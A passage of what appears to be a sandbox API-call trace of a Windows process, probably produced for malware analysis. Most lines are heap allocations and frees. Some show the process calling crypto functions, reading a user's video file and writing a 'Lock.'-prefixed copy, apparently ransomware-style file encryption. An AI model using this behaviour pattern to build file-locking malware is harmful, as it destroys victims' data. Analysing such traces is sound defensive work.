[0258.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51598 [0258.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51538 [0258.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51370 [0258.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0258.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51568 [0258.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0258.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0258.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51430 [0258.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0258.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512e0 [0258.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51388 [0258.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0258.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51310 [0258.921] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0258.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a08 | out: hHeap=0x970000) returned 1 [0258.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0258.921] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0258.921] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0258.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69a28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0258.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0258.922] CryptDestroyHash (hHash=0xa87250) returned 1 [0258.922] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.922] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.922] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0258.922] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0258.922] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.923] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos/XujfB_EFQdQYTzBm8.flv" (normalized: "c:\\users\\fd1hvy\\videos\\xujfb_efqdqytzbm8.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0258.923] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0258.923] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0258.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0258.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0258.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0258.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0258.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0258.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0258.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0258.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0258.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0258.923] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0258.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0258.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0258.924] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0258.924] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0258.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0258.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0258.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0258.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0258.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0258.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0258.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0258.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0258.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0258.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0258.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x9787d0 [0258.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0258.924] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos/" (normalized: "c:\\users\\fd1hvy\\videos")) returned 0x11 [0258.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9787d0 | out: hHeap=0x970000) returned 1 [0258.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0258.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0258.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0258.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0258.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0258.926] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos/Lock.XujfB_EFQdQYTzBm8.flv" (normalized: "c:\\users\\fd1hvy\\videos\\lock.xujfb_efqdqytzbm8.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0258.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0258.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0258.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0258.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0258.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0258.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0258.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0258.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0258.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0258.927] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0258.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0258.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0258.927] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0258.927] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0258.927] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0258.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0258.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0258.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0258.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0258.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0258.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0258.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0258.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0258.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0258.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0258.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0258.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0258.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0258.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0258.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe55020 [0258.932] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0258.932] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x2bd9, lpOverlapped=0x0) returned 1 [0258.990] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0258.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0258.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0258.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0258.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0258.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2bd9) returned 0x3bf0050 [0258.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe55020 | out: hHeap=0x970000) returned 1 [0258.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0258.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0258.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0258.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0258.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0258.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0258.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0258.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0258.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2bd9) returned 0x3bf2c38 [0258.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0050 | out: hHeap=0x970000) returned 1 [0258.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0258.994] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0258.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0258.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0258.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0258.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0258.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2bd9) returned 0x3bf0050 [0258.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0258.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0050 | out: hHeap=0x970000) returned 1 [0258.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0258.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0258.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0258.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0258.994] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0258.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0258.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0258.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0258.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0258.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0258.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0258.995] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0258.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55e68 [0258.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0258.995] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0258.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55e68 | out: hHeap=0x970000) returned 1 [0258.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0258.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0258.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c68 [0258.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0258.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0258.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0258.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0258.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2bd9) returned 0x3bf0050 [0258.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0258.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c78 [0258.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0258.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0258.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0258.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cc8 [0258.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0258.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0258.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0258.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ce8 [0258.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0258.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0258.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0258.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510b8 [0258.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0258.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0258.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0258.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0258.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0258.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2bd9) returned 0x2f14010 [0258.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0258.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0258.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0258.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0258.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0258.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0258.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0258.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0258.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0258.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0258.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0258.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0258.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0258.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0258.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0258.997] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0258.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0258.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0258.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0258.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0258.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0258.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0258.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0258.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0258.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0258.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0258.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0258.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0258.997] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0258.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0258.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0258.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0258.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0258.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0258.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0258.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0258.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0258.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0258.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0258.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0258.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0258.998] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0258.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0258.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0258.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0258.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0258.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0258.998] 